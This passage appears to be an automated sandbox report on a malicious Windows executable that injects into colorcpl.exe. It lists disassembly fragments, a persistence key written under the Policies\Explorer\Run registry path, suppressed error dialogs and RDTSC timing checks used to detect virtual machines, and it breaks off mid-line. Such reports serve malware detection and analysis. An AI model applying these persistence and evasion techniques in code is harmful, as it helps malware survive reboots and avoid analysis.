Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00414977 push esi; ret 1_2_00414978
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AAD0D1 push ecx; ret 5_2_04AAD0E4
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A548E6 push es; retf 5_2_00A548ED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A549C5 pushfd ; iretd 5_2_00A549C6
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A54977 push esi; ret 5_2_00A54978
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A5AAF5 push eax; ret 5_2_00A5AB48
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A5ABAC push eax; ret 5_2_00A5ABB2
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A5AB42 push eax; ret 5_2_00A5AB48
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A5AB4B push eax; ret 5_2_00A5ABB2
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A57C73 push cs; retf 5_2_00A57C7E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_00A54E46 push 76AC60C6h; retf 5_2_00A54E4B
Source: initial sample | Static PE information: section name: .text entropy: 7.95430334165

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\colorcpl.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run L63DUFWXGVE
Source: C:\Users\user\Desktop\Scn14.092020.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Scn14.092020.exe | RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Scn14.092020.exe | RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First addres